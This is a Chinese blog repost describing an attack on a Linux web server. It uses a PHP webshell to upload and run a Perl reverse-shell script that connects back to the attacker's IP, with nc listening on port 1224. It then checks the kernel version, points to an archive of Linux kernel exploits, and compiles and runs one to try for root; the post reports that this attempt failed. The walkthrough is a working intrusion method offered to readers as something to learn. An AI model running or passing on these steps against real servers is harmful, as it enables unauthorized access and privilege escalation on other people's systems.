先在網(wǎng)站目錄上傳1.pl,是個反彈腳本 Phpshell執(zhí)行chmod +x 1.pl，給1.pl執(zhí)行權(quán)限，圖0

然后執(zhí)行 ./1.pl 本機(jī)IP 1224
接著本機(jī)監(jiān)聽nc -vv -l -p 1224，圖1 反彈成功

輸入id bash-3.2$ id uid=529(zeicom) gid=525(zeicom) groups=525(zeicom) bash-3.2$ 這里uid=529(zeicom)還不是root權(quán)限，輸入uname –r 返回：2.6.18-164.11.1.el5PAE
找對應(yīng)的exp, 這里地址整理很齊全可以這里下 http://bbs.tian6.com/linux_exp/index.htm
命令輸入pwd,這個命令是顯示當(dāng)前目錄，當(dāng)前目錄就是shell的目錄，我在shell上傳1.c 然后命令輸入 Gcc –o 2 2.c? //把2.c編譯成可執(zhí)行文件 chmod +x 2 //給2有執(zhí)行權(quán)限 ./2 //執(zhí)行2,2是溢出的 exp文件。圖2

看圖可以發(fā)現(xiàn)沒提權(quán)成功，過程就是這樣。以后遇到linux可以這樣提權(quán)。不會linux提權(quán)的朋友可以學(xué)習(xí)下，會有所收獲的。

轉(zhuǎn)載于:https://www.cnblogs.com/0xcc/archive/2011/11/13/2246946.html

總結(jié)

以上是生活随笔為你收集整理的linux溢出提权的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。